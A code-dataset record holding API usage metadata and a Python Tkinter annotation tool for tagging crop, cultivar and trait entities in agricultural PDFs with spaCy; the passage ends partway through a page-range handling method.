"Tkinter.Label", "line_number": 754, "usage_type": "call"}, {"api_name": "Tkinter.Entry", "line_number": 758, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 763, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 768, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 808, "usage_type": "call"}, {"api_name": "Tkinter.Tk", "line_number": 824, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 826, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 828, "usage_type": "call"}, {"api_name": "Tkinter.Tk", "line_number": 834, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 836, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 838, "usage_type": "call"}, {"api_name": "Tkinter.Tk", "line_number": 843, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 845, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 847, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 874, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 878, "usage_type": "call"}, {"api_name": "Tkinter.Entry", "line_number": 882, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 887, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 892, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 935, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 962, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 965, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 968, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 971, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 986, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 993, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 1005, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 1009, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 1039, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 1043, "usage_type": "call"}, {"api_name": "Tkinter.Entry", "line_number": 1047, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 1052, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 1057, "usage_type": "call"}, {"api_name": "Tkinter.Frame", "line_number": 1067, "usage_type": "attribute"}, {"api_name": "Tkinter.Frame.__init__", "line_number": 1071, "usage_type": "call"}, {"api_name": "Tkinter.Frame", "line_number": 1071, "usage_type": "attribute"}, {"api_name": "Tkinter.Label", "line_number": 1074, "usage_type": "call"}, {"api_name": "Tkinter.Label", "line_number": 1078, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 1081, "usage_type": "call"}, {"api_name": "Tkinter.Button", "line_number": 1085, "usage_type": "call"}, {"api_name": "Tkinter.Scrollbar", "line_number": 1088, "usage_type": "call"}, {"api_name": "Tkinter.Listbox", "line_number": 1089, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 1101, "usage_type": "call"}]} +{"seq_id": "74043233444", "text": "#!/bin/env python3\nimport platform\nimport spacy.tokens\n\nfrom agParse import *\nfrom tkinterColorList import *\nfrom datetime import datetime\nfrom functools import partial\nfrom json2py import *\nimport os.path\nfrom py2json import *\nfrom pyxpdf import Document, Page, Config\nfrom pyxpdf.xpdf import TextControl\nimport random\nimport tkinter as tk\nfrom tkinter import filedialog as fd\nfrom tkinter.scrolledtext import ScrolledText\n\n# 1) WE NEED TO RESOLVE STANDARDIZING THINGS SUCH AS\n# \"ROUGH AWNS\" and \"AWNS ARE ROUGH\", WHITE ALEURONE AND ALEURONE IS WHITE. NOTE: Maybe compound traits\n# do not make sense because we need to be able to know\n# relationships. We should look at co-reference resolution.\n# See: https://medium.com/huggingface/state-of-the-art-neural-coreference-resolution-for-chatbots-3302365dcf30\n#\n# 2) WE NEED TO GROUP ANNOTATIONS SUCH AS TRAITS INTO CATEGORIES THAT\n# MAKE SENSE TO THE USER. RIGHT NOW WE HAVE \"early maturity\" AND \"winter\"\n# AS TRAITS WHILE ACCORDING TO THE SPECS WE SHOULD BE RETURNING\n# “Maturity” : “early maturity”, “Season”: “winter”\n#\n# 3) \"It is medium maturing and medium tall (averages about 41 inches in plant height) with fair straw strength.\"\n# In the sentence above, medium tall will be tagged as trait. There is additional useful information in brackets\n# that tells you exactly what medium tall means (above 41 inches). Is it possible to extract this additional\n# information about the definition of medium tall.\n#\n# 4) If we are able to get NER to be reasonably accurate, the next step is being able to link properties to a\n# particular crop variety. Identifying crop traits is good but what would even be better is to know what crop\n# variety these traits are associated with. EXAMPLE:\n#\n# Alexis is a two-row spring malting and feed barley. It was released by Western Plant Breeders. It was selected from\n# the cross BI1622a/Triumph. It is midseason in maturity and is mid-tall with fair straw strength. At the time of\n# evaluation it was resistant to stripe rust. It was evaluated as Entry 966 in the UC Regional Cereal Testing program\n# in 1997 for spring planting in the intermountain region of northern California.\n#\n# What would be very useful is knowing what \"it\" is referring to in the paragraph above.\n#\n# 5) Need to start thinking about an ontology\n\n\n# Create NER GUI class\nclass CropNerGUI:\n \"\"\" A class used to represent NER tagging GUI window.\n\n\n ...\n Attributes\n ----------\n self.rootWin : tk.Tk()\n tKinter class that represents the main window\n self.rootWin.title : self.rootWin.title()\n Title for the GUI\n self.rootWin.geometry : self.rootWin.geometry()\n Size for the main window\n self.model_dir : str\n Path to language model directory\n self.tags : list\n Agricultural data NER tags.\n self.colors : list\n Colors used to highlight tags in self.tags. Should have the same number of entries as self.tags. NER tag in\n self.tags[i] will be highlighted using color self.colors[i]\n self.self.tag_colors_buttonID : dict\n Dictionary with a tag as key and [color, buttonID] as value\n self.raw_file : _io.TextIOWrapper\n PDF or text file selected by user using the GUI\n self.annotation_file : _io.TextIOWrapper\n Annotation file selected by user using the GUI\n self.chunk : int\n Current logical partition of the document being annotated. By default, this is the page number because it is\n natural to annotate a document in page increments.\n self.pdf_document : pyxpdf.Document\n PDF to be annotated that was selected using GUI\n self.file_name : str\n Name of the pdf/text file being annotated. e.g., BarCvDescLJ11.pdf\n self.file_prefix : str\n File path prefix (minus file type) e.g., for BarCvDescLJ11.pdf path prefix is Data/DavisLJ11/BarCvDescLJ11\n self.file_mode : str\n Specifies whether the program is working on a pdf or text file\n self.scrolled_text_line_content_index : dict\n Contains index position of characters in a given line. Key = line number tuple is index of first and last\n characters respectively. {2: (114, 228)} = line 2 has characters from index 114 to index 228\n self.nlp_agdata : class (spacy.lang)\n spaCy language model. Defaults to en_core_web_lg if not specified\n self.cust_ents_dict : dict\n Contains NER tag annotations. key = chunk number, values = entities\n self.page_number : int\n Current page number\n self.metadata_toggle : bool\n Boolean determining whether the metadata panel should be visible or not\n self.json_initialized : bool\n Whether a json file has been initialized in the workspace or not\n\n NOTE: Though the widgets are global variables, we will not document them here. Most are self-evident. We have\n added inline comments in the code itself.\n\n Methods\n -------\n font_plus(self)\n Increase font size for text in ScrolledText (text box).\n font_minus(self)\n Decrease font size for text in ScrolledText (text box).\n add_ent(self)\n Add a user defined named entity to the application.\n remove_ent(self)\n Remove a user defined named entity from the application.\n get_ner_model_dir(self)\n Select a folder containing spaCy nlp pipeline.\n open_file(self, file_type: str)\n Open a file (pdf/text) to be annotated or an annotation file (json) to be reviewed. selected using the GUI.\n load_page(self)\n Load contents of a PDF or text file into text box.\n update_scrolled_text_line_content_index(self)\n Populate the dictionary self.scrolled_text_line_content_index with position indices for the first and\n last characters in each line in the text box.\n highlight_ent(self, start_char: int, end_char: int, label: str)\n Given the start index and end index of a named entity, highlight it in the text box.\n pre_tag(self, selection: str)\n Pre-tag selected content or all the text in text box with NER tags.\n overlap(self, interval_one: list, interval_two: list) -> bool\n Check to see if two intervals overlap.\n get_selected_interval(self) -> tuple\n Determines the index of the first and last characters (char_start, char_end) selected by the user.\n get_ner(self, tag_label: str)\n Tag a piece of text that has been selected as a named entity.\n remove_tag(self)\n Untag a piece of text that was classified as a named entity.\n review_annotations(self)\n Load a json file containing annotations and review it.\n clear_message(self)\n Clear warning message\n clear_data(self)\n Clear data in text box and dictionary containing annotations.\n remove_all_tags(self)\n Remove all the NER tags on text loaded in the text box.\n tag_ner_with_spacy(self, text: str) -> spacy.tokens.Doc\n Use NLP pipeline to identify named entities in the text.\n file_save(self)\n Save current annotation.\n next_page(self)\n Load the next page.\n go(self)\n Start running the GUI running.\n quit(self)\n Callback method attached to the quit button.\n \"\"\"\n\n def __init__(self):\n \"\"\" Initialize CropNerGU object\"\"\"\n\n self.rootWin = tk.Tk()\n self.rootWin.title(\"GEMS NER Annotation Tool\")\n self.rootWin.geometry('1250x700')\n self.model_dir = None\n self.tags=[\"ALAS\", \"CROP\", \"CVAR\", \"JRNL\", \"PATH\", \"PED\", \"PLAN\", \"PPTD\", \"TRAT\"]\n self.colors=[\"violet\", \"lawn green\", \"deep sky blue\", \"yellow\", \"red\", \"orange\",\"pink\", \"brown\",\n \"MediumPurple1\"]\n self.tag_colors_buttonID = {}\n self.raw_file = None\n self.annotation_file = None\n self.chunk = None\n self.pdf_document = None\n self.file_name = None\n self.file_prefix = None\n self.file_mode = None\n self.scrolled_text_line_content_index = {}\n self.nlp_agdata = None\n self.cust_ents_dict = {}\n self.page_number = 0\n self.metadata_toggle = False\n self.json_initialized = False\n\n # ----------------------- Widgets for GUI start here.\n # Default font size for text in ScrolledText. Should be a string format\n # for a number e.g., '16'\n self.font_size = \"16\"\n\n # Top level frame for GUI\n self.top_frame = tk.Frame(self.rootWin)\n self.top_frame.pack(side=tk.TOP, fill=\"x\")\n\n # Blank label with 3 empty spaces used for formatting. Ensures there is some\n # space between the edge and first widget e.g., button\n self.blank_label_one = tk.Label(self.top_frame, text=\" \")\n self.blank_label_one.pack(side=tk.LEFT)\n\n # The loops below is used to create buttons the user will click to tag words/phrases\n #\n # Just inside the for loop, populate a dictionary with a tag as key and [color, buttonID] as value. This will\n # make it easy to retrieve the color for a tag when a user selects a word/phrase and clicks on a button to\n # tag the word/phrase. When the user tags the word/phrase, it will be highlighted in the GUI.\n # This dictionary helps us retrieve the color for that particular tag. The loop does the equivalent\n # of self.tag_colors[\"highlight\"] = [\"gray\", buttonID] in an iteration\n #\n # After populating the dictionary, we will create a button for the different NER tags.\n #\n # NOTE: partial is used to pass a function to a widget e.g., button where the input changes for different\n # buttons. Below, we want to call the function self.get_ner (which takes a single input) several\n # times but each time we pass it a different value depending on the button that was clicked. If the ALAS\n # button is clicked, we want to pass the text \"ALAS\" but if the \"CROP\" button was clicked we want to pass the\n # text CROP. So, partial(self.get_ner, \"ALAS\") is the same as self.get_ner(\"ALAS\")\n #\n for i in range(len(self.tags)):\n tag_value = self.tags[i]\n color_value = self.colors[i]\n\n # Create button\n btn = tk.Button(self.top_frame, highlightbackground=color_value,text=tag_value,\n command=partial(self.get_ner, tag_value))\n # Button colors already behaved differently between all 3 major platforms (highlightbackground\n # behaves... weirdly on MacOS, just has an outline for Linux, and doesn't work on Windows). Now\n # it still behaves differently on all of them, but fully highlights the button on Windows.\n if(platform.system() == \"Windows\"):\n btn.config(bg=color_value)\n btn.pack(side=tk.LEFT)\n self.tag_colors_buttonID[tag_value] = [color_value, btn]\n\n # Blank label with empty spaces used for formatting.\n self.space_label = tk.Label(self.top_frame, text=\" \", width=3)\n self.space_label.pack(side=tk.LEFT)\n\n # Button user will click to tag selected text\n self.pre_tag_selection_btn = tk.Button(self.top_frame, text=\"Pre-Tag Selection\",\n command=partial(self.pre_tag, \"selection\"))\n self.pre_tag_selection_btn.pack(side=tk.LEFT)\n\n # Button user will click to remove tags\n self.clear_tag_btn = tk.Button(self.top_frame, text=\"Remove-Tag(s)\", command=self.remove_tag)\n self.clear_tag_btn.pack(side=tk.LEFT)\n\n # Button user will click to tag all the text in the text box\n self.pre_tag_page_btn = tk.Button(self.top_frame, text=\"Pre-Tag Page(s)\", command=partial(self.pre_tag, \"page\"))\n self.pre_tag_page_btn.pack(side=tk.LEFT)\n\n # Remove all tags button\n self.clear_btn = tk.Button(self.top_frame, text=\"Remove All Tags\", width=15, command=self.remove_all_tags)\n self.clear_btn.pack(side = tk.LEFT)\n\n # Frame with buttons that will contain user defined NER tags. Button with NER tags added by users will\n # be added to this frame. This is done in the function add_ent\n self.cust_ent_frame = tk.Frame(self.rootWin)\n self.cust_ent_frame.pack(side=tk.TOP, fill=\"x\")\n\n # Label displaying the current working json file\n self.working_file_label = tk.Label(self.rootWin, text=\"Working Annotation File: \"+str(self.annotation_file))\n self.working_file_label.pack(side=tk.TOP)\n\n # Blank label for formatting\n self.blank_label_two = tk.Label(self.cust_ent_frame, text=\" \")\n self.blank_label_two.pack(side=tk.LEFT)\n\n # Frame containing options for users to add their own NER tags\n self.edit_ent_frame = tk.Frame(self.rootWin)\n self.edit_ent_frame.pack(side=tk.TOP, fill=\"x\", padx=\"40\")\n\n # Label for text entry for a new NER tag defined by the user\n self.trait_label = tk.Label(self.edit_ent_frame, text=\"Enter Entity Label:\", width=20)\n self.trait_label.pack(side=tk.LEFT)\n\n # Text entry widget for user to type the name of a user defined NER tag they want to add\n self.trait_entry = tk.Entry(self.edit_ent_frame, width=10)\n self.trait_entry.pack(side=tk.LEFT)\n\n # Button to add new NER tag\n self.add_ent_btn = tk.Button(self.edit_ent_frame, text=\"Add Entity\", width=10, command=self.add_ent)\n self.add_ent_btn.pack(side=tk.LEFT)\n\n # Button to remove NER tag added by the user\n self.remove_ent_btn = tk.Button(self.edit_ent_frame, text=\"Remove Entity\", width=10, command=self.remove_ent)\n self.remove_ent_btn.pack(side=tk.LEFT)\n\n # Middle frame for text box and additional file elements like metadata entries\n self.middle_frame = tk.Frame(self.rootWin)\n self.middle_frame.pack(side=tk.TOP, fill=\"x\")\n\n # Text box. Note, height defines height in widget in lines based on font size. If the font size is bigger,\n # you end up with a bigger textbox because each line will occupy more space.\n self.text = ScrolledText(self.middle_frame, height=20, width=140, font=\"Times \"+self.font_size, wrap='word')\n self.text.focus_force()\n self.text.pack(side=tk.TOP)\n\n # Metadata button for setting metadata for current raw file\n self.metadata_btn = tk.Button(self.edit_ent_frame, text=\"Metadata\", width=10, command = self.toggle_metadata)\n self.metadata_btn.pack(side=tk.RIGHT)\n\n # Doc label\n self.doc_label = tk.Label(self.middle_frame, text=\"Document Name\")\n # Doc entry\n self.doc_entry = tk.Entry(self.middle_frame, width=30)\n # URL label\n self.url_label = tk.Label(self.middle_frame, text=\"URL\")\n # URL entry\n self.url_entry = tk.Entry(self.middle_frame, width=30)\n # Date label\n self.date_label = tk.Label(self.middle_frame, text=\"Date file created\")\n # Date entry\n self.date_entry = tk.Entry(self.middle_frame, justify=tk.CENTER, width=30)\n self.date_entry.insert(0, \"File not initialized\")\n self.date_entry.config(state=tk.DISABLED)\n\n # Specify how text will be highlighted in the textbox when a user selects it and click on a button to\n # tag the text. If we only had one button (ALAS), we would have done this using the command\n # self.text.tag_configure(\"ALAS\", background=\"violet\") but we need to do this for all the NER tag buttons\n # hence the for loop\n for tag, color_buttonID in self.tag_colors_buttonID.items():\n color = color_buttonID[0]\n self.text.tag_configure(tag, background=color)\n\n # Frame just below the text box. It contains buttons in the \"Exit\" button row\n self.bottom_frame = tk.Frame(self.rootWin)\n self.bottom_frame.pack(side=tk.TOP, fill=\"x\")\n # Blank label for formatting\n self.blank_label_three = tk.Label(self.bottom_frame, text=\" \")\n self.blank_label_three.pack(side=tk.LEFT)\n # Exit button\n self.exit_btn = tk.Button(self.bottom_frame, text=\"Exit\",width=10,command=self.quit)\n self.exit_btn.pack(side = tk.LEFT)\n # Load button\n self.load_btn = tk.Button(self.bottom_frame, text=\"Load Data\", width=10, command=self.load_page_from_button)\n self.load_btn.pack(side=tk.LEFT)\n # Clear data button\n self.clear_data_btn = tk.Button(self.bottom_frame, text=\"Clear Data\", width=10, command=self.clear_data)\n self.clear_data_btn.pack(side=tk.LEFT)\n # Clear message button\n self.msg_btn = tk.Button(self.bottom_frame, text=\"Clear Warning Message\", width=20, command=self.clear_message)\n self.msg_btn.pack(side=tk.LEFT)\n # Next page button\n self.next_btn = tk.Button(self.bottom_frame, text=\"Next Page\", command=self.next_page)\n self.next_btn.pack(side=tk.LEFT)\n # Save button\n self.save_btn = tk.Button(self.bottom_frame, text=\"Save\", width=10, command=self.file_save)\n self.save_btn.pack(side=tk.LEFT)\n\n # Frame that will contain messages being displayed to the user\n self.msg_frame = tk.Frame(self.rootWin)\n self.msg_frame.pack(side=tk.TOP)\n # Label to display messages\n self.msg = tk.Label(self.msg_frame, text=\"\", padx=5, pady=5)\n self.msg.pack(side=tk.LEFT)\n\n # Frame for selecting files and folders\n self.open_frame = tk.Frame(self.rootWin)\n self.open_frame.pack(side=tk.TOP,fill=\"x\")\n # Blank label for formatting\n self.blank_label_five = tk.Label(self.open_frame, text=\" \")\n self.blank_label_five.pack(side=tk.LEFT)\n # Select file to be annotated button\n self.open_button = tk.Button(self.open_frame,text='Select Raw Data File(PDF/txt)', width=18,\n command=partial(self.open_file, \"pdf/txt\"))\n self.open_button.pack(side=tk.LEFT)\n # Select folder with language model\n self.ner_model_button = tk.Button(self.open_frame, text='Select NER model folder', width=18,\n command=self.get_ner_model_dir)\n self.ner_model_button.pack(side=tk.LEFT)\n # Enter page you would like to load. Start with 1 as opposed to the conventional 0 numbering in CS\n self.page_label = tk.Label(self.open_frame, text=\"Raw Data File Page Num:\", width=18)\n self.page_label.pack(side=tk.LEFT)\n self.page_entry = tk.Entry(self.open_frame, width=5)\n self.page_entry.pack(side=tk.LEFT)\n self.page_entry.bind(\"<Return>\", self.load_page_from_button)\n # Select annotation file\n self.annotation_btn = tk.Button(self.open_frame, text=\"Select Annotation File(JSON)\",width=20,\n command=partial(self.open_file, \"json\"))\n self.annotation_btn.pack(side=tk.LEFT)\n # Button to increase font in the text box (Font +)\n self.font_plus = tk.Button(self.open_frame, text=\"Font +\", width=10, command=self.font_plus)\n self.font_plus.pack(side=tk.LEFT)\n # Button to decrease font in the text box (Font +)\n self.font_minus = tk.Button(self.open_frame, text=\"Font -\", width=10, command=self.font_minus)\n self.font_minus.pack(side=tk.LEFT)\n \n\n def font_plus(self):\n \"\"\"\n Increase font size for text in ScrolledText (text box), changing window size with it.\n\n Expects the global variable self.font_size which is of type string to be set. The default value is \"16\".\n This function increments self.font_size by 1 and then updates font size in self.text.\n \"\"\"\n prev_text_size = self.text.winfo_reqheight()\n self.font_size = str(int(self.font_size) + 1)\n self.text['font'] = \"Times \"+self.font_size\n new_size = (self.text.winfo_reqheight() - prev_text_size) + self.rootWin.winfo_reqheight()\n self.rootWin.geometry(str(self.rootWin.winfo_reqwidth()) + \"x\" + str(new_size))\n\n def font_minus(self):\n \"\"\"\n Decrease font size for text in ScrolledText (text box), changing window size with it.\n\n Expects the global variable self.font_size which is of type string to be set. The default value is \"16\".\n This function decreases self.font_size by 1 and then updates font size in self.text.\n \"\"\"\n prev_text_size = self.text.winfo_reqheight()\n if not (int(self.font_size) <= 1):\n self.font_size = str(int(self.font_size) - 1)\n else:\n self.msg.config(text=\"Font size can't get any smaller!\", foreground=\"red\")\n self.text['font'] = \"Times \"+self.font_size\n new_size = (self.text.winfo_reqheight() - prev_text_size) + self.rootWin.winfo_reqheight()\n self.rootWin.geometry(str(self.rootWin.winfo_reqwidth()) + \"x\" + str(new_size))\n\n def add_ent(self):\n \"\"\"\n Add a user defined named entity to the application.\n\n Expects the text entry for specifying a user defined entity tag to have the name of a user defined named\n entity. It then adds this new named entity to the application.\n \"\"\"\n ent_label = self.trait_entry.get().upper()\n if ent_label in self.tags:\n self.msg.config(text=\"Warning!! Cannot add entity. Another entity with the same label already exists!\",\n foreground=\"red\")\n else:\n # The code below select a color from color_list which is defined in tkinterColorList.py\n # If it loops through the length of the colors in color_list and does not find a color\n # that has not already been used, it generates a random color.\n color = None\n n = len(color_list)\n for i in range(n):\n # Randomly pick a color. This will hopefully get one that contrasts well with existing colors.\n i_color = color_list[random.randint(0, n)]\n # Check to see of the color selected has not been used\n if i_color not in self.colors:\n color = i_color\n break\n # Note, because we are selecting colors randomly from color_list, there is a chance we will not\n # find a color that has not already been used. This can happen if by chance we keep\n # selecting colors that have been used. If this happens, just create a random color.\n if color is None:\n color = \"#\" + (\"%06x\" % random.randint(0, 16777215))\n self.colors.append(color)\n self.tags.append(ent_label)\n btn = tk.Button(self.cust_ent_frame, highlightbackground=color, text=ent_label,\n command=partial(self.get_ner, ent_label))\n if(platform.system() == \"Windows\"):\n btn.config(bg=color)\n btn.pack(side=tk.LEFT)\n self.text.tag_configure(ent_label, background=color)\n self.tag_colors_buttonID[ent_label] = [color, btn]\n\n def remove_ent(self):\n \"\"\"\n Remove a user defined named entity from the application.\n\n Expects the text entry for specifying a user defined entity tag to have the name of a user defined named\n entity. It then removes this named entity from the application.\n \"\"\"\n ent_label = self.trait_entry.get().upper()\n try:\n color = self.tag_colors_buttonID[ent_label][0]\n ent_btn = self.tag_colors_buttonID[ent_label][1]\n ent_btn.pack_forget()\n # Remove elements from dictionary and arrays\n self.tag_colors_buttonID.pop(ent_label)\n self.colors.remove(color)\n self.tags.remove(ent_label)\n\n # Remove highlighting\n self.text.tag_remove(ent_label, \"1.0\", \"end\")\n\n # Remove from annotation dictionary. This can probably be simplified.\n new_ents = []\n input_text = self.cust_ents_dict[self.chunk][0]\n entities = self.cust_ents_dict[self.chunk][1]\n for ent in entities:\n if not (ent[2] == ent_label):\n new_ents.append(ent)\n new_ents.sort()\n self.cust_ents_dict[self.chunk] = [input_text, new_ents]\n\n # Clear warning message\n self.msg.config(text=\"\")\n except:\n self.msg.config(text=\"WARNING!! The entity you tried to remove does not exist.\", foreground=\"red\")\n\n def toggle_metadata(self):\n \"\"\"\n A button toggle to introduce/remove entry boxes for setting metadata for the json file.\n \"\"\"\n self.metadata_toggle = not self.metadata_toggle\n\n if self.metadata_toggle:\n self.text.pack(side=tk.LEFT, padx=(30,0))\n self.doc_label.pack(side=tk.TOP)\n self.doc_entry.pack(side=tk.TOP, pady=(0,10))\n self.url_label.pack(side=tk.TOP)\n self.url_entry.pack(side=tk.TOP, pady=(0,10))\n self.date_label.pack(side=tk.TOP)\n self.date_entry.pack(side=tk.TOP, pady=(0,10))\n else:\n self.text.pack(side=tk.TOP)\n self.doc_label.pack_forget()\n self.doc_entry.pack_forget()\n self.url_label.pack_forget()\n self.url_entry.pack_forget()\n self.date_label.pack_forget()\n self.date_entry.pack_forget()\n\n def get_ner_model_dir(self):\n \"\"\"\n Select a folder containing spaCy nlp pipeline.\n\n Loads the nlp pipeline that will be used for tagging.\n\n Raises\n ------\n OSError\n If the selected folder does not contain a valid spaCy pipeline, an OSError will be thrown and\n a default language model is used instead.\n \"\"\"\n \n dir = fd.askdirectory()\n # Do nothing if the user presses cancel or X\n if dir == \"\":\n return\n\n self.model_dir = dir\n try:\n self.nlp_agdata = spacy.load(self.model_dir)\n lang = self.nlp_agdata.lang # Attribute error thrown if valid language model is not selected\n self.msg.config(text=\"NOTE: Model for \"+lang+\" language identified\", foreground=\"orange\")\n except OSError:\n self.msg.config(text=\"WARNING!!: Selected folder does not contain valid language model \\n\"\n \"Default model 'en_core_web_lg' will be used.\", foreground=\"red\")\n self.nlp_agdata = spacy.load(\"en_core_web_lg\")\n # Resize window to fit error (it'll push buttons below the bottom if you don't\n # do this and the window has been resized before)\n new_height = self.rootWin.winfo_reqheight() + 15\n self.rootWin.geometry(str(self.rootWin.winfo_reqwidth()) + \"x\" + str(new_height))\n # NOTE: Commenting the line below for now. We will try using spaCy noun phrases instead\n # to capture tags such as 'rough owns'\n # self.nlp_agdata.add_pipe(\"compound_trait_entities\", after='ner')\n\n\n\n \n def open_file(self, file_type: str):\n \"\"\"\n Open a file (pdf/text) to be annotated or an annotation file (json) to be reviewed. selected using the GUI.\n\n Parameters\n ----------\n file_type : str\n Type of file that was selected. This is either 'json' or 'pdf_or_text'\n\n If a user selects a pdf ot text file, it will be loaded into the text box for annotation. If a json file\n containing annotation is selected, it will bo loaded with the annotations highlighted.\n \"\"\"\n # Clear warning message, if one exists\n self.msg.config(text=\"\")\n\n # file type\n if file_type == \"json\":\n filetypes = [(\"json files\", \"*.json\")]\n elif file_type == \"pdf/txt\":\n filetypes = [(\"data files\", \"*.pdf *.txt\")]\n\n # show the open file dialog\n f = fd.askopenfile(filetypes=filetypes)\n\n # do nothing is no file is chosen\n if f is None:\n self.msg.config(text=\"No file was chosen\", foreground=\"red\")\n return\n elif file_type == \"json\":\n self.next_btn.pack_forget()\n self.annotation_file = f\n self.file_prefix = self.annotation_file.name.split(\".\")[0]\n self.file_name = self.annotation_file.name.split(\"/\")[-1]\n self.working_file_label.config(text=\"Working Annotation File: \"+str(self.annotation_file.name.split(\"/\")[-1]))\n self.json_initialized = True\n self.raw_file=None\n self.review_annotations()\n elif file_type == \"pdf/txt\":\n\n self.raw_file=f\n\n # Ends the operation if a raw file wasn't selected\n if self.raw_file is None:\n self.msg.config(text=\"No raw data file has been selected. Please select a file to load.\", foreground=\"red\")\n return\n\n # Detects file type\n self.file_mode = self.raw_file.name.split(\".\")[-1] \n\n self.page_entry.delete(0, tk.END)\n\n if self.file_mode == \"pdf\":\n # Bring back the \"Next Page\" button, placing it before the save button.\n self.save_btn.pack_forget()\n self.next_btn.pack(side=tk.LEFT)\n self.save_btn.pack(side=tk.LEFT)\n self.page_entry.insert(0, \"1\")\n else:\n # Remove \"Next Page\" button if loading a txt file, which has no pages.\n self.next_btn.pack_forget()\n\n self.file_prefix = self.raw_file.name.split(\".\")[0]\n self.file_name = self.raw_file.name.split(\"/\")[-1]\n self.pdf_document = None\n self.annotation_file = None\n self.json_initialized = False\n\n # Reset metadata\n self.working_file_label.config(text=\"Working Annotation File: \"+str(self.annotation_file))\n self.doc_entry.delete(0, tk.END)\n self.doc_entry.insert(0, self.file_name)\n self.url_entry.delete(0, tk.END)\n self.date_entry.config(state=tk.NORMAL)\n self.date_entry.delete(0, tk.END)\n self.date_entry.insert(0, \"File not initialized\")\n self.date_entry.config(state=tk.DISABLED)\n\n self.load_page()\n else:\n self.msg.config(text=\"Warning!! Please select a valid file.\", foreground=\"red\")\n\n def page_num_is_valid(self, page_num):\n \"\"\"\n Returns True if page_num is a number, False if page_num is completely invalid, and -1 if it's a range.\n Note that the function expects spacing to have already been cleaned out of it prior to being called.\n In other words, it won't necessarily recognize something like \"1 - 5\" as a range.\n \"\"\"\n if page_num.isdigit():\n return True\n dash_index = page_num.find(\"-\")\n if(dash_index == -1):\n return False\n pg1 = page_num[0 : dash_index]\n if not pg1.isdigit():\n return False\n pg2 = page_num[dash_index + 1:]\n if not pg2.isdigit():\n return False\n return -1\n\n def handle_bad_page_requests(self, page_num_valid):\n \"\"\"\n If a page not in the doc is requested, this will set the page number to a valid\n one and print a warning.\n\n page_num_valid is passed in so that this method already knows whether it should\n be checking a list or single number.\n \"\"\"\n doc_length = len(self.pdf_document)\n err = False\n double_err_text = \" At least one other error was not displayed- see entry box.\"\n if page_num_valid == -1: # ie, page number is a range\n if self.page_number[0] < 1: # This will only take effect if the starting page is set to 0. Beginning hyphens are already invalid.\n self.page_number[0] = 1\n self.msg.config(text=\"First page entered is less than 1; setting first page to 1\", foreground=\"red\")\n self.page_entry.delete(0, tk.END)\n self.page_entry.insert(0, \"1-\" + str(self.page_number[1]))\n err = True\n if self.page_number[1] < 1:\n self.page_number[1] = 1\n self.page_entry.delete(0, tk.END)\n if(err): # This will only happen if the user enters some form of \"0-0\"- trying to do a negative anywhere doesn't count as a range, just invalid\n self.msg.config(text=\"PDFs start with page 1, not 0. Additionally, you can enter just one page instead of a range if you'd like. Going to page 1.\", foreground=\"red\")\n self.page_entry.insert(0, \"1\")\n else:\n self.msg.config(text=\"Second page entered is less than 1; setting second page to 1\", foreground=\"red\")\n self.page_entry.insert(0, str(self.page_number[0]) + \"-1\")\n err = True\n if self.page_number[1] > doc_length:\n self.page_number[1] = doc_length\n if(err):\n err_text = \"Last page entered is greater than the length of the PDF; setting last page to the end of the PDF.\" + double_err_text\n else:\n err_text = \"Last page entered is greater than the length of the PDF; setting last page to the end of the PDF.\"\n err = True\n self.msg.config(text=err_text, foreground=\"red\")\n self.page_entry.delete(0, tk.END)\n self.page_entry.insert(0, str(self.page_number[0]) + \"-\" + str(self.page_number[1]))\n if self.page_number[0] > doc_length:\n self.page_number[0] = doc_length\n err_text = \"First page entered is greater than the length of the PDF; setting first page to the end of the PDF.\"\n if(err):\n err_text = err_text + double_err_text\n self.msg.config(text=err_text, foreground=\"red\")\n self.page_entry.delete(0, tk.END)\n self.page_entry.insert(0, str(self.page_number[0]) + \"-\" + str(self.page_number[1]))\n else: # ie. there is a single page\n if self.page_number < 1: # This may as well be self.page_number == 0. A beginning hyphen is already invalid (not a digit or a range).\n self.page_number = 1\n self.msg.config(text=\"Page entered is too small; setting to 1\", foreground=\"red\")\n self.page_entry.delete(0, tk.END)\n self.page_entry.insert(0, \"1\")\n if self.page_number > doc_length:\n self.page_number = doc_length\n self.msg.config(text=\"Page entered is too large; setting it to the last page (\" + str(doc_length) + \")\", foreground=\"red\")\n self.page_entry.delete(0, tk.END)\n self.page_entry.insert(0, str(doc_length))\n\n def handle_page_range(self, page_range: list):\n \"\"\"\n Sets everything related to the page number with the assumption that\n the user has entered a range of numbers rather than a single page. I.e.,\n the range is ordered correctly, self.page_number is set to a list of\n two integer values, and self.chunk is set to the starting page.\n\n Spacing should be removed from page_range before it's passed into this method.\n \"\"\"\n dash_index = page_range.find(\"-\")\n pg1 = int(page_range[0 : dash_index])\n pg2 = int(page_range[dash_index + 1:])\n self.page_number = [pg1, pg2]\n # Switch first and last page if the user's first number was the smaller one.\n if(self.page_number[1] < self.page_number[0]):\n 